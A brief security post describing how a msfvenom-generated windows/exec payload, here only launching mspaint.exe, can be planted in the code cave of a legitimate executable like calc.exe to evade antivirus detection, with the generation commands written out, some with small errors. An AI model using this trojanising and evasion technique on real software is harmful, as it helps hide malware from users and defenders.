Trojan exploiting CodeCaves for AV bypass
ENG: Interestingly, the /windows/exec payload generated via msfvenom is not detected by well-known antiviruses such as McAfee ,Kaspersky and TrendMicro when included in a legitimate executable such as calc.exe by exploiting a "Code Cave". What is a CodeCave ? A code cave is an area of memory allocated but not exploited by an executable. msfvenom -p /windows/exec CMD=mspaint.exe EXITFUNC=thread -f c -o shellcode.bin msfvenom -p /windows/exec CMD=mspaint.exe EXITFUNC=thread -f raw -o <executable_name>,.exe PS_1: The MSF framework is a widely used framework and therefore well known to AV vendors. PS_2: The shellcode generated by the framework has not been obfuscated/modified in any way.